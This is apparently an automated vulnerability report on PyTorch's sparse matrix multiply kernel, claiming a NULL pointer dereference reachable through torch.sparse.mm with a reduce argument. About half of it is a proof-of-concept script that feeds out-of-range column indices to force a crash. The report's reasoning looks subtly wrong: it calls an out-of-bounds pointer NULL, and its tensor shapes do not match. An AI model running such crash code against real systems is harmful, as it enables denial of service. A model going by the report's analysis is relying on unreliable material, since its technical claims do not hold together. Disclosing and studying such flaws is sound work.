Vulnerability Type: NULL Pointer Dereference (CWE-476)

Location:

• File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
• Line: 60-62

Details:
The _update function in SpmmReduceKernel.cpp dereferences out_ptr and other_ptr without checking if they are NULL. This occurs in the scalar fallback loop at lines 60-62. The vulnerability is triggered when creating a sparse CSR tensor with invalid col_indices that exceed the dimensions, causing other_ptr = other_data + c * K to point to invalid memory or NULL. When the vectorization loops finish and scalar loop executes, NULL dereference occurs.

The vulnerability affects torch.sparse.mm() when used with the reduce parameter on CPU operations.

Impact:

• Segmentation fault leading to Denial of Service (DoS)
• Potential information disclosure through invalid memory reads
• Memory corruption through invalid pointer arithmetic
• Crash when accessing invalid memory addresses

Exploit Code (first 50 lines):

#!/usr/bin/env python3
import torch
import sys

def exploit_null_pointer_dereference():
    print("CVE Exploit: NULL Pointer Dereference in torch.sparse.mm()")
    print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60-62")
    
    # Create a sparse CSR tensor with invalid column indices
    # Column index exceeds dense matrix dimensions
    crow_indices = torch.tensor([0, 1, 2], dtype=torch.int64)
    col_indices = torch.tensor([0, 10], dtype=torch.int64)
    values = torch.tensor([1.0, 2.0], dtype=torch.float32)

    sparse_matrix = torch.sparse_csr_tensor(
        crow_indices=crow_indices,
        col_indices=col_indices,
        values=values,
        size=(2, 5),
        dtype=torch.float32,
        device='cpu'
    )

    dense_matrix = torch.randn(3, 4, dtype=torch.float32, device='cpu')
    result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')

Severity: High
CVSS Score: 7.5

Source File: /pytorch/results/exploit_cve1_null_pointer_spmm.py